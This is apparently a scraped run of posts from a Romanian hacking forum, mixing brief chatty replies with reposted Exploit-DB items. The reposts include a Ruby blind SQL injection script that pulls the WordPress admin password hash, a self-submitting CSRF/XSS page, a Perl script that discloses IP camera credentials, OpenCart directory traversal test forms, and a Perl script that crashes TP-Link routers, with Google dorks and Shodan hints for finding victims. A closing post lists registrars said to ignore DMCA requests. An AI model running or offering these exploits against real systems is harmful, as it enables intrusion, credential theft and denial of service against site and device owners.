Gonzalez

Uite aici: wjunction.com E plin de uploaderi acolo si cica e Webmaster Forum, vei gasi informatii utile despre programele care te intereseaza. -Gonzalez

Metallica - Ride The Lightning.mp3 -Gonzalez

Bun venit pe RST. -Gonzalez

Mie nu-mi merge cum trebuie forumul, ce ma fac? ))) -Gonzalez

Bun venit! -Gonzalez

# Exploit Title: ClipShare 4.1.1 - Multiples Vulnerabilites # Exploit Author: Esac # Vulnerable Software: ClipShare - Video Sharing Community Script 4.1.4 # Official site: http://www.clip-share.com # Software License: Commercial. #all versions are vulnerable: #Last Checked: 27 March 2013 # Note : to exploit this vulnerability MAGIC_QUOTES_GPC directive must be turned off on server side.(php.ini) ============================================================================================== vuln file : gvideos.php , param : gid Poc : http://server/mavideo/gvideos.php?gid=1 [Blind] #to exlploit this poc , must group to be added previously with some videos publics Real exploitation : http://server/mavideo/gvideos.php?gid=1 AND 1=1 ==> return normal page http://server/mavideo/gvideos.php?gid=1 AND 1=2 ==> return page with some errors ( or with nothing - white page ) ------------------------------------------------------------------------------------------------------------------------------------------------- vuln file : channel_detail.php , param : chid Poc : http://server/mavideo/channel_detail.php?chid=4 [Blind] Real exploitation : http://server/mavideo/channel_detail.php?chid=4 AND 1=1 ==> return normal page http://server/mavideo/channel_detail.php?chid=4 AND 1=2 ==> return page with some errors ( or with nothing - white page ) ------------------------------------------------------------------------------------------------------------------------------------------------- vuln file : uprofile.php , param : UID Poc : http://server/mavideo/uprofile.php?UID=66 [Blind] Real exploitation : http://server/mavideo/uprofile.php?UID=66 AND 1=1 ==> return normal page http://server/mavideo/uprofile.php?UID=66 AND 1=2 ==> return page with some errors ( or with nothing - white page ) ------------------------------------------------------------------------------------------------------------------------------------------------- vuln file : ufavour.php , param : UID Poc : http://server/mavideo/ufavour.php?UID=66 [Blind] Real exploitation : http://server/mavideo/ufavour.php?UID=66 AND 1=1 ==> return normal page http://server/mavideo/ufavour.php?UID=66 AND 1=2 ==> return page with some errors ( or with nothing - white page ) ------------------------------------------------------------------------------------------------------------------------------------------------- vuln file : ufriends.php , param : UID Poc : http://server/mavideo/ufriends.php?UID=66 [Blind] Real exploitation : http://server/mavideo/ufriends.php?UID=66 AND 1=1 ==> return normal page http://server/mavideo/ufriends.php?UID=66 AND 1=2 ==> return page with some errors ( or with nothing - white page ) ------------------------------------------------------------------------------------------------------------------------------------------------- vuln file : uplaylist.php , param : UID Poc : http://server/mavideo/uplaylist.php?UID=66 [Blind] Real exploitation : http://server/mavideo/uplaylist.php?UID=66 AND 1=1 ==> return normal page http://server/mavideo/uplaylist.php?UID=66 AND 1=2 ==> return page with some errors ( or with nothing - white page ) ------------------------------------------------------------------------------------------------------------------------------------------------- vuln file : ugroups.php , param : UID Poc : http://server/mavideo/ugroups.php?UID=66 [Blind] Real exploitation : http://server/mavideo/ugroups.php?UID=66 AND 1=1 ==> return normal page http://server/mavideo/ugroups.php?UID=66 AND 1=2 ==> return page with some errors ( or with nothing - white page ) ------------------------------------------------------------------------------------------------------------------------------------------------- PwnEd. Tested version: Sunday , March 27, 2013 | Version: 4.1.4 | Username: admin | Logout Copyright © 2006-2008 ClipShare. All rights reserved. ~ Game Over ~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Greetz : White Tarbouch Team & Cobra & Dami ==> Made In Moroco <== ./Esac Source: Exploit-DB

Frumos articol. Clientul roman vrea sa faci gratis, sau sa il si platesti in timp ce faci proiectul. -Gonzalez

Bun venit! Dar e cu limbajul tau? -Gonzalez

Bun venit pe RST. -Gonzalez

Bravo lui, cred ca e foarte frumos sa fi milionar la varsta lui. -Gonzalez

Doar la mine e asa? Dupa parerea mea ar trebui sa fie in mijloc. Oricum a-ti facut o treaba de nota 10, cu blog si cu homepage-ul. Bravo si felicitari. -Gonzalez

Corect spus. -Gonzalez

Felicitari. -Gonzalez

2005 - vremuri bune. -Gonzalez

Baietii au drepate, mai bine te pui sa inveti programare sau altceva ce iti place, in programare salarul e bun. Mai bine lasi hack-ul pentru altcineva. Eu cel putin asa as proceda daca as fi la inceput de drum. -Gonzalez

Curve, masini si coca. -Gonzalez

# Exploit Title: WordPress IndiaNIC FAQ 1.0 Plugin Blind SQL Injection # Google Dork: inurl:wp-content/plugins/faqs-manager # Date: 21.03.2013 # Exploit Author: m3tamantra (http://m3tamantra.wordpress.com/blog) # Vendor Homepage: http://wordpress.org/extend/plugins/faqs-manager/ # Software Link: http://downloads.wordpress.org/plugin/faqs-manager.zip # Version: 1.0 # Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patc= h (cli) ############## # Description: ############## # The "order" and "orderby" parameter is vulnerable for SQL Injection # Example URL: http://127.0.0.1:9001/wordpress/wp-admin/admin.php?page=3Din= ic_faq&orderby=3D<sqli> # PoC take some time to finish (15min on my Testsystem). # I could speed it up with Multithreading but I'm to lazy right now #### Vulnerable code part (wp_list_table.php) #############################= ################################### # # function prepare_items() { # $this->_column_headers =3D array($this->_columns, $this->_hidden_columns= , $this->_sortable_columns); # $sort_order =3D isset($_GET['order']) ? $_GET['order'] : "ASC"; # $orderby_column =3D isset($_GET['orderby']) ? " ORDER BY {$_GET['orderby= ']} {$sort_order}" : false; # # global $wpdb; # if (is_array($this->_sql)) { # if ($orderby_column =3D=3D false) { # $data =3D $this->_sql; # } else { # $data =3D $this->_sql; # usort($data, array(&$this, 'usort_reorder')); # } # } else { # $data =3D $wpdb->get_results("{$this->_sql}{$orderby_column}", ARRAY_A= ); # } ###########################################################################= ##################################### ################################# #### Blind SQL Injection PoC #### ################################# require "net/http" require "uri" $target =3D "" # EDIT ME # $cookie =3D "" # EDIT ME # authenticated user session # Example: #$target =3D "http://127.0.0.1:9001/wordpress/" #$cookie =3D "wordpress_a6a5d84619ae3f833460b386c064b9e5=3Dadmin%7C13640405= 45%7C86475c1a4fe1fc1fa5f1ebb04db1bc8f; wp-settings-1=3Deditor%3Dhtml; wp-se= ttings-time-1=3D1363441353; comment_author_a6a5d84619ae3f833460b386c064b9e5= =3Dtony; comment_author_email_a6a5d84619ae3f833460b386c064b9e5=3Dtony%40bau= er.de; comment_author_url_a6a5d84619ae3f833460b386c064b9e5=3Dhttp%3A%2F%2Fs= ucker.de; wordpress_test_cookie=3DWP+Cookie+check; wordpress_logged_in_a6a5= d84619ae3f833460b386c064b9e5=3Dadmin%7C1364040545%7Cd7053b96adaa95745023b91= 694bf30ef; PHPSESSID=3D1h7f2o5defu6oa8iti6mqnevc7; bp-activity-oldestpage= =3D1" if $target.eql?("") or $cookie.eql?("") puts "\n[!]\tPlease set $target and $cookie variable\n" raise end $chars =3D ["."] + ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a $hash =3D "$P$" $i =3D 0 # chars index $j =3D 4 # hash index def sqli_send() sqli =3D URI.escape("(CASE WHEN ((SELECT ASCII(SUBSTRING(user_pass, #{$= j}, 1)) FROM wp_users WHERE id =3D 1) =3D #{$chars[$i].ord}) THEN 1 ELSE 1*= (SELECT table_name FROM information_schema.tables)END) --") uri =3D URI.parse("#{$target}wp-admin/admin.php?page=3Dinic_faq&orderby= =3D#{sqli}") http =3D Net::HTTP.new(uri.host, uri.port) #http.set_debug_output($stderr) request =3D Net::HTTP::Get.new(uri.request_uri) request["User-Agent"] =3D "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8;= rv:19.0) Gecko/20100101 Firefox/19.0" request["Cookie"] =3D $cookie resp =3D http.request(request) if( resp.code !=3D "200" ) puts "something is wrong response =3D #{resp.code}" raise end # In WordPress default settings there will no SQL error displayed # but when an error apperes we don't get any result. # The PoC search for "No record found" and suppose there was an error return resp.body().match(/No record found/)=20 end def print_status() output =3D "HASH: #{$hash} try #{$chars[$i]}" print "\b"*output.length + output end while( $hash.length < 34 ) if( !sqli_send() ) $hash +=3D $chars[$i] $j +=3D 1 $i =3D 0 else $i +=3D 1 end print_status() end puts "\n[+]\thave a nice day \n"

<html> <!-- # Exploit Title: WordPress IndiaNIC FAQ 1.0 Plugin CSRF + XSS # Google Dork: inurl:wp-content/plugins/faqs-manager # Date: 21.03.2013 # Exploit Author: m3tamantra (http://m3tamantra.wordpress.com/blog) # Vendor Homepage: http://wordpress.org/extend/plugins/faqs-manager/ # Software Link: http://downloads.wordpress.org/plugin/faqs-manager.zip # Version: 1.0 # Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) ############## # Description: ############## # IndiaNIC FAQ Settings Page is vulnerable for CSRF. # The Ask Question area (front-end) is vulnerable for XSS. It is possible to insert <script>alert(1)</script> in question parameter. # The Captcha value can be read from captcha parameter (hidden field) # ################################### #### Part of Ask Question form #### ################################### <form action="" method="POST" name="iNICfaqsAskForm_1"> <input type="hidden" value="1" name="group_id"> <input type="hidden" value="1" name="from_user"> <input type="hidden" value="inic_faq_questions" name="action"> <input type="hidden" value="5540" name="captcha"> <=================== We don't need the captcha Image when we have this xD #################################################################### #### Request from Ask Question area (XSS in question parameter) #### #################################################################### POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: 127.0.0.1:9001 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:19.0) Gecko/20100101 Firefox/19.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://127.0.0.1:9001/wordpress/?p=11 Content-Length: 143 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache group_id=1&from_user=1&action=inic_faq_questions&captcha=8560&who_asked=lalalallala%40gmail.com&question=XSS+TEST+<script>alert(1)</script>%3F&captcha_code=8560 # When admin navigate to Question-Area (back-end) arbitrary JavaScript will execute. ####################################################################### --> <title> ##################################################### ############## IndiaNIC FAQ 1.0 CSRF ################ ##################################################### </title> <body> <!-- replace "127.0.0.1:9001/wordpress" --> <form action="http://127.0.0.1:9001/wordpress/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="inic_faq_settings" /> <input type="hidden" name="alert_email_address" value="m3tamantra@127.0.0.1" /> <input type="hidden" name="capture_email" value="1" /> <input type="hidden" name="notify_when_answered" value="1" /> <input type="hidden" name="listing_template" value="lalalalalalalalalalalalal" /> <input type="hidden" name="custom_css" value="babaaaaaammmmmmmm" /> <input type="hidden" name="custom_js" value="alert(1234)" /> </form> <script>document.forms[0].submit();</script> </body> </html>

#!/usr/bin/perl # # [+] StarVedia IPCamera IC502w IC502w+ v020313 remote bypass username/password disclosure exploit # Author: Todor Donev # Email: todor.donev at gmail dot com # Type: Hardware # # Thanks to Tsvetelina Emirska the best friend in my life # and all my other friends for the help and support which # gives me. Kind regards to all of you, who read my lil' # exploits. # Bulgaria, Sofia # 03.2013 # # Shodanhq r0x 4 teh lulz!! # http://www.youtube.com/watch?v=qNyN1AY-YZQ Cheeerzz # # Another bug, hint: you can edit this code and add some lines for remote change the password. ##### use LWP::Simple; if (@ARGV == 0) {&usg;} while (@ARGV > 0) { $type = shift(@ARGV); $t = shift(@ARGV); } if ($type eq "-d") { my $r = get("http://$t/cgi-bin/passwd.cgi?") or die(" $t: Not vulneruble, $!\n"); print " [+] StarVedia IPCamera IC502w IC502w+ v020313 remote bypass username/password disclosure exploit\n"; print " [!] Exploiting: $t\n"; if ($r =~ m/<INPUT type=text name=user size=20 maxlength=19 value="(.*)">/g) { $result .= " [o] User: $1\n"; }else{die(" Try another exploit, $!");} if ($r =~ m/<INPUT type=password name=passwd size=20 maxlength=19 value="(.*)">/g){ $result .= " [o] Password: $1\n"; }else{die("Try another exploit or restart the exploit\n");} sleep(1); print " [\\m/] BINGO!!!\n\a".$result; } sub usg(){ print " [!] usg: perl $0 [-r or -d] <victim:port>\n"; print " [!] -d: disclosure password option\n"; print " [!] exp: perl $0 -d 127.0.0.1 \n"; exit; }

[waraxe-2013-SA#098] - Directory Traversal Vulnerabilities in OpenCart 1.5.5.1 =============================================================================== Author: Janek Vind "waraxe" Date: 19. March 2013 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-98.html Description of vulnerable software: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ OpenCart is a turn-key ready "out of the box" shopping cart solution. You simply install, select your template, add products and your ready to start accepting orders. http://www.opencart.com/ Affected are all OpenCart versions, from 1.4.7 to 1.5.5.1, maybe older too. ############################################################################### 1. Directory Traversal Vulnerabilities in "filemanager.php" ############################################################################### Reason: insufficient sanitization of user-supplied data Attack vectors: 1. user-supplied POST parameters "directory", "name", "path", "from", "to" Preconditions: 1. Logged in as admin with filemanager access privileges Script "filemanager.php" offers for OpenCart admins various file related services: directory listing and creation, image file listing, file copy/move/unlink, upload, image resize. By the design OpenCart admin can manage files and directories only inside specific subdirectory "image/data/". It means, that even if you have OpenCart admin privileges, you still are not suppose to get access to the files and directories below "image/data/". So far, so good. But what about directory traversal? Let's have a look at the source code. PHP script "admin/controller/common/filemanager.php" line 66: ------------------------[ source code start ]---------------------------------- public function directory() { $json = array(); if (isset($this->request->post['directory'])) { $directories = glob(rtrim(DIR_IMAGE . 'data/' . str_replace('../', '', $this->request->post['directory']), '/') . '/*', GLOB_ONLYDIR); if ($directories) { $i = 0; foreach ($directories as $directory) { $json[$i]['data'] = basename($directory); $json[$i]['attributes']['directory'] = utf8_substr($directory, strlen(DIR_IMAGE . 'data/')); ... $this->response->setOutput(json_encode($json)); ------------------------[ source code end ]------------------------------------ We can see, that directory traversal is prevented by removing "../" substrings from user submitted parameters. At first look this seems to be secure enough - if we can't use "../", then directory traversal is impossible, right? Deeper analysis shows couple of shortcomings in specific filtering method. First problem - if OpenCart is hosted on Windows platform, then it's possible to use "..\" substring for directory traversal. Test (parameter "token" must be valid): -------------------------[ test code start ]----------------------------------- <html><body><center> <form action="http://localhost/oc1551/admin/index.php?route=common/filemanager/directory&token=92aa6ac32b4c8e7a175c3dc9f7754d25" method="post"> <input type="hidden" name="directory" value="..\..\..\"> <input type="submit" value="Test"> </form> </center></body></html> --------------------------[ test code end ]------------------------------------ Server response is in JSON format and contains listing of subdirectories outside of OpenCart main directory. Second problem - filtering with "str_replace" can be tricked by using custom strings. If we use "..././" substring, then after filtering in becomes "../". So it appears, that implemented anti-traversal code is ineffective and can be bypassed. Test (parameter "token" must be valid): -------------------------[ test code start ]----------------------------------- <html><body><center> <form action="http://localhost/oc1551/admin/index.php?route=common/filemanager/directory&token=92aa6ac32b4c8e7a175c3dc9f7754d25" method="post"> <input type="hidden" name="directory" value="..././..././..././..././"> <input type="submit" value="Test"> </form> </center></body></html> --------------------------[ test code end ]------------------------------------ Server response is exactly same as in previous test - information about directory structure outside of OpenCart main directory has been disclosed. PHP script "filemanager.php" contains 14 uses of "str_replace('../', ''," code. Most of the public functions in "filemanager.php" are affected by directory traversal vulnerability: public function directory() -> listing of subdirectories public function files() -> listing of image files public function create() -> creation of new directories public function delete() -> deletion of arbitrary files and directories public function move() -> renaming of files or directories public function copy() -> copying of files or directories public function rename() -> renaming of files or directories public function upload() -> uploading of image or flash files Contact: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ come2waraxe@yahoo.com Janek Vind "waraxe" Waraxe forum: http://www.waraxe.us/forums.html Personal homepage: http://www.janekvind.com/ Random project: http://albumnow.com/ ---------------------------------- [ EOF ] ------------------------------------

Sorry I forgot to write headers in previous mail. # Exploit Title: [possible ways to exploit CVE-2012-1663( GNUTLS-3.0.13)] # Google Dork: [if relevant] (we will automatically add these to the GHDB) # Date: [Mar 20, 2013] # Exploit Author: [Shawn the R0ck] # Vendor Homepage: [http://www.gnutls.org/] # Software Link: [download link if available] # Version: [<= 3.0.13] # Tested on: [GNU/Linux] # CVE : [CVE-2012-1663] PoC: http://www.exploit-db.com/sploits/24865.tar.bz2 I'm glad to share this to you guys. The test code was attached. You also could find them here: https://github.com/citypw/arsenal-4-sec-testing/tree/master/libgnutls/CVE-2012-1663 CVE-2013-1663[1] is a possible remote DOS attack issue. This issue has been fixed[2] in >=GNUTLS-3.0.14. I hacked on it for hours and figure out a few prerequisites could make it vulnerable: ============================= REQUIRED: - prior to GNUTLS 3.0.14 - crafted certificate ============================= Attacking SCENES - a client import a crafted cert file for sending req to server( CA?) - a "server" import a crafted cert file for sending req to other server( CA?) ---> With high frequency uses above manipulations Stand on the client side, the attacker should try to construct a crafted certificate for triggering the below function fails: ret = gnutls_pubkey_import_x509(pcert->pubkey, crt, 0); if (ret < 0) { gnutls_pubkey_deinit(pcert->pubkey); /* pcert->pubkey should be NULL now */ ret = gnutls_assert_val(ret); goto cleanup; } I made up two crafted cert files( client.pem, client2.pem) seems would trigger the double free issue in client's side. Warning: Don't try it on your host machine because it would cost too much memory then makes your machine very slow. shawn@sl13:~/gnutls_compile_uses/CVE-2012-1663$ ./ex-serv-x509 processing server set to null? Server ready. Listening to port '5556'. shawn@sl13:~/gnutls_compile_uses/CVE-2012-1663$ ./attack.sh ................ ................. ................... Another terminal: killall client Test platform: Slackware 13.37 + GNUTLS-3.0.13 [1] http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1663 [2] Upstream fix http://git.savannah.gnu.org/gitweb/?p=gnutls.git;a=commitdiff;h=9c62f4feb2bdd6fbbb06eb0c60bfdea80d21bbb8 -- GNU powered it... GPL protect it... God blessing it... regards Shawn

?#!/usr/local/bin/perl # # # TP-Link TL-WR740N Wireless Router Remote Denial Of Service Exploit # # # Vendor: TP-LINK Technologies Co., Ltd. # Product web page: http://www.tp-link.us # # Affected version: # # - Firmware version: 3.16.4 Build 130205 Rel.63875n (Released: 2/5/2013) # - Hardware version: WR740N v4 00000000 (v4.23) # - Model No. TL-WR740N / TL-WR740ND # # Summary: The TL-WR740N is a combined wired/wireless network connection # device integrated with internet-sharing router and 4-port switch. The # wireless N Router is 802.11b&g compatible based on 802.11n technology # and gives you 802.11n performance up to 150Mbps at an even more affordable # price. Bordering on 11n and surpassing 11g speed enables high bandwidth # consuming applications like video streaming to be more fluid. # # Desc: The TP-Link WR740N Wireless N Router network device is exposed to a # remote denial of service vulnerability when processing a HTTP request. This # issue occurs when the web server (httpd) fails to handle a HTTP GET request # over a given default TCP port 80. Sending a sequence of three dots (...) to # the router will crash its httpd service denying the legitimate users access # to the admin control panel management interface. To bring back the http srv # and the admin UI, a user must physically reboot the router. # # # ============================== Playground: ============================== # # Shodan: WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Router WR740N" # # # nmap -sV 192.168.0.1 # # Starting Nmap 6.01 ( http://nmap.org ) at 2013-03-19 04:53 Central European Standard Time # Nmap scan report for 192.168.0.1 # Host is up (0.00s latency). # Not shown: 999 closed ports # PORT STATE SERVICE VERSION # 80/tcp open http TP-LINK WR740N WAP http config # MAC Address: AA:BB:CC:DD:EE:FF (Tp-link Technologies CO.) # Service Info: Device: WAP # # Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . # Nmap done: 1 IP address (1 host up) scanned in 12.42 seconds # # -------------------------------------------------------------------------- # Changed Probe Directive in nmap-service-probes file [4 d range]: # - Line: 4682: Probe TCP GetRequest q|GET / HTTP/1.0\r\n\r\n| # + Line: 4682: Probe TCP GetRequest q|GET /... HTTP/1.0\r\n\r\n| # -------------------------------------------------------------------------- # # # nping -c1 --tcp -p80 192.168.0.1 --data "474554202f2e2e2e20485454502f312e310d0a0d0a" # # Starting Nping 0.6.01 ( http://nmap.org/nping ) at 2013-03-19 04:55 Central European Standard Time # SENT (0.0920s) TCP 192.168.0.101:19835 > 192.168.0.1:80 S ttl=64 id=21796 iplen=61 seq=1961954057 win=1480 # RCVD (0.1220s) TCP 192.168.0.1:80 > 192.168.0.101:19835 RA ttl=64 id=0 iplen=40 seq=0 win=0 # # Max rtt: 0.000ms | Min rtt: 0.000ms | Avg rtt: 0.000ms # Raw packets sent: 1 (75B) | Rcvd: 1 (46B) | Lost: 0 (0.00%) # Tx time: 0.04000s | Tx bytes/s: 1875.00 | Tx pkts/s: 25.00 # Rx time: 1.04000s | Rx bytes/s: 44.23 | Rx pkts/s: 0.96 # Nping done: 1 IP address pinged in 1.12 seconds # # -------------------------------------------------------------------------- # # # nmap -Pn 192.168.0.1 -p80 # # Starting Nmap 6.01 ( http://nmap.org ) at 2013-03-19 04:57 Central European Standard Time # Nmap scan report for 192.168.0.1 # Host is up (0.00s latency). # PORT STATE SERVICE # 80/tcp closed http # MAC Address: AA:BB:CC:DD:EE:FF (Tp-link Technologies CO.) # # Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds # # ============================= !Playground =============================== # # # Tested on: Router Webserver # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # # Copyleft (c) 2013, Zero Science Lab # Macedonian Information Security Research And Development Laboratory # http://www.zeroscience.mk # # # Advisory ID: ZSL-2013-5135 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5135.php # # # 17.03.2013 # use IO::Socket; $ip="$ARGV[0]"; $port="$ARGV[1]"; print "\n\n\x20"."\x1f"x42 ."\n"; print "\x20\x1f"."\x20"x40 ."\x1f\n"; print "\x20\x1f TP-Link TL-WR740N httpd DoS Exploit \x1f\n"; print "\x20\x1f"."\x20"x40 ."\x1f\n"; print "\x20\x1f"."\x20"x7 ."\x16"x5 ."\x20"x15 ."\x16"x5 ."\x20"x8 ."\x1f\n"; print "\x20\x1f"."\x20"x9 ."\x16"."\x20"x19 ."\x16"."\x20"x10 ."\x1f\n"; print "\x20" ."\x1f"x42 ."\n"; print "\x20\x4" ."\x20"x40 ."\x4\n"; print "\x20" ."\x1e" x 42 ."\n"; if($#ARGV<1) { print "\n\n\x20\x20\x1a\x20Usage: $0 <ip> <port>\n\n"; exit(); } $socket=IO::Socket::INET->new( Proto => "tcp", PeerAddr => $ip, PeerPort => $port ); $ta4ke="\x47\x45\x54\x20". "\x2f\x2e\x2e\x2e". "\x20\x48\x54\x54". "\x50\x2f\x31\x2e". "\x31\x0d\x0a\x0d". "\x0a"; print "\n\x20\x1a\x20Sending evil payload...\n"; sleep 2; print $socket "$ta4ke"; sleep 5; close $socket; print "\x20\x1a\x20HTTPd successfully poked.\n"; sleep 2; print "\x20\x1a\x20Verifying with Nmap...\n"; sleep 2; system("nmap -Pn $ip -p $port"); print "\n\x20\x1a\x20Playing goa-psy...\n"; sleep 2; system("start C:\\Progra~1\\Winamp\\winamp.exe http://scfire-ntc-aa01.stream.aol.com:80/stream/1008"); sleep 1; print "\x20\x1a\x20All Done!\n"; sleep 1; # Codename: Threetwoees

This post would contain a list of domain registrars that are offshore.By 'offshore' i mean they won't share your data to 3rd parties like USA companies and won't suspend domain based on DMCA. Here we go http://prq.se/ -Offer Anonymous Domain Registration (Based in Sweden) http://www.binero.se/ -PirateBay.se Domain registar http://netart-registrar.com/ - torrentz.eu domain registrar http://www.webnames.ru -Good registrar for .su and .ws Remember:If you chose a .com , .net , .org you will still be subjected to US law.This means a court order to verisign and you lost your domain. Some Offshore domain tld : .ws , .su

Arata fain, bravo. Mie imi place. -Gonzalez

Eminem - Stan (Long Version) ft. Dido -Gonzalez